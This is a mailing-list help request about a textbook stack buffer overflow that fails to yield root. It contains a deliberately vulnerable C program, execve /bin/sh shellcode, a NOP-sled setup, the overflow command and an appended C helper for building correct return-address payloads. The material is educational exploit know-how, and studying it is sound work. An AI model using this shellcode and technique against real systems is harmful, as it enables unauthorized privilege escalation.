Stack and Buffer Overflow Confusion
- From: Markus Pitha <spamtrap@xxxxxxxxxx>
- Date: Fri, 27 Jan 2006 20:04:20 +0000
Hello,
At the moment I am reading a book called "Forbitten Code". In this book there are
examples, but they never work for me, although I'm sure that I understood
everything. My question is not exactly an assembler question, but I hope
you can help me, because I think you assembler programmers understand
these things best.
I want to describe the example. It is about getting root permissions on
one's own computer with the help of a buffer overflow.
First of all there is the vulnerable program:
#include <string.h>
int main(int argc, char **argv) {
char buffer[5];
strcpy(buffer, argv[1]);   /* unbounded copy of argv[1] into a 5-byte stack buffer */
return 0;
}
Then I saved the shellcode, which I got from the book, to a variable SHELLCODE.
The shellcode looks like this:
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c
\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
It is explained that \x90 is the "No Operation" instruction. "shellcode"
contains 46 hex numbers, which also include /bin/sh, as you can see below:
export SHELLCODE=`perl -e 'print "\x90"x200;'``cat shellcode`
Then I looked into the stack:
0xbfd13510: "HOSTNAME=gentoo"
0xbfd13520: "SHELLCODE=", '\220' <repeats 190 times>...
0xbfd135e8:
"\220\220\220\220\220\220\220\220\220\2201À°F1Û1ÉÍ\200ë\026[1À\210C\a\211[\b\211C\f°\v\215K\b\215S\fÍ\200èåÿÿÿ/bin/sh"
0xbfd13621: "SHELL=/bin/bash"
Because the address 0xbfd13520 contains the string "SHELLCODE", I have
to choose a later address to get to the code, so I chose at least
0xbfd13530.
Now I can use this address as the jump-back address for the buffer
overflow. I have to write the hex numbers in little-endian order
because my processor is an Intel. (By the way, I also tried a 100-times loop below.)
../vuln `perl -e 'print "\x30\x35\xd1\bf"x10;'`
When I start vuln with the parameters, I just get a segmentation fault
instead of root rights.
First I thought that the shellcode could be wrong, but in an earlier
example I managed to get root privileges, but _only_ once.
Can anybody imagine where this example fails?
Thanks,
Markus
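Two of the steps in the post above, writing the return address in little-endian order and choosing an address that lands inside the NOP sled, are easy to get wrong when typed by hand. The C program below is an added example, not code from the post or from the book: it packs a 32-bit address the way the x86 stack expects it, checks the result for NUL bytes (strcpy stops at the first one), computes a target inside the sled of an environment string laid out as NAME=<sled><shellcode> and verifies that the target really falls within the sled, and decodes Perl double-quoted escapes so the byte sequence a `perl -e 'print "..."'` argument actually produces can be inspected. In Perl, `\b` inside a double-quoted string is a backspace (0x08), so `"\x30\x35\xd1\bf"` yields five bytes rather than four. The addresses 0xbfd13520 and 0xbfd13530, the name SHELLCODE and the sled length of 200 are taken from the post; the function names and the sled-midpoint heuristic are assumptions for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* x86 is little-endian: 0xbfd13530 must be written as 30 35 d1 bf. */
static void pack_le32(uint32_t addr, unsigned char out[4]) {
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* strcpy() stops at the first 0x00, so a return address containing a NUL
   byte would truncate the payload. Returns 1 if any byte is NUL. */
static int payload_has_nul(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return 1;
    return 0;
}

/* The environment string is laid out as "NAME=" followed by sled_len NOP
   bytes and then the shellcode. Return an address in the middle of the sled
   (assumed heuristic) so the jump still hits NOPs if the stack shifts a bit. */
static uint32_t pick_sled_target(uint32_t env_str_addr, const char *name,
                                 size_t sled_len) {
    uint32_t sled_start = env_str_addr + (uint32_t)strlen(name) + 1; /* +1: '=' */
    if (sled_len == 0) return 0;
    return sled_start + (uint32_t)(sled_len / 2);
}

/* Check that target lies within [sled_start, sled_start + sled_len). */
static int target_in_sled(uint32_t target, uint32_t env_str_addr,
                          const char *name, size_t sled_len) {
    uint32_t sled_start = env_str_addr + (uint32_t)strlen(name) + 1;
    return target >= sled_start && target < sled_start + (uint32_t)sled_len;
}

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode the escapes Perl applies inside a double-quoted string, as far as
   this example needs them: \xHH (one or two hex digits; no digits gives 0x00)
   and \b (backspace, 0x08). Any other escaped character stands for itself.
   Returns the number of bytes written to out. */
static size_t perl_dq_decode(const char *s, unsigned char *out, size_t cap) {
    size_t n = 0;
    while (*s && n < cap) {
        if (*s != '\\') { out[n++] = (unsigned char)*s++; continue; }
        s++;                                   /* skip the backslash */
        if (*s == '\0') break;
        if (*s == 'x') {
            int v = 0, digits = 0;
            s++;
            while (digits < 2 && hexval((unsigned char)*s) >= 0) {
                v = v * 16 + hexval((unsigned char)*s);
                s++; digits++;
            }
            out[n++] = (unsigned char)v;
        } else if (*s == 'b') {
            out[n++] = 0x08; s++;
        } else {
            out[n++] = (unsigned char)*s++;
        }
    }
    return n;
}

static void dump(const char *label, const unsigned char *p, size_t n) {
    printf("%s", label);
    for (size_t i = 0; i < n; i++) printf(" %02x", p[i]);
    printf("  (%zu bytes)\n", n);
}

int main(void) {
    unsigned char b[16];
    size_t n;
    uint32_t t = pick_sled_target(0xbfd13520u, "SHELLCODE", 200);
    printf("sled target 0x%08x, in sled: %d\n", t,
           target_in_sled(t, 0xbfd13520u, "SHELLCODE", 200));
    pack_le32(0xbfd13530u, b);
    dump("0xbfd13530 little-endian:", b, 4);
    printf("contains NUL: %d\n", payload_has_nul(b, 4));
    n = perl_dq_decode("\\x30\\x35\\xd1\\xbf", b, sizeof b);
    dump("perl \"\\x30\\x35\\xd1\\xbf\":", b, n);
    n = perl_dq_decode("\\x30\\x35\\xd1\\bf", b, sizeof b);
    dump("perl \"\\x30\\x35\\xd1\\bf\":", b, n);
    return 0;
}
```

Compile with `gcc -std=c99 -Wall` and run; the last two lines of output show the four-byte and five-byte sequences side by side, which is the quickest way to see why a repeated five-byte unit never lines up with a four-byte return-address slot.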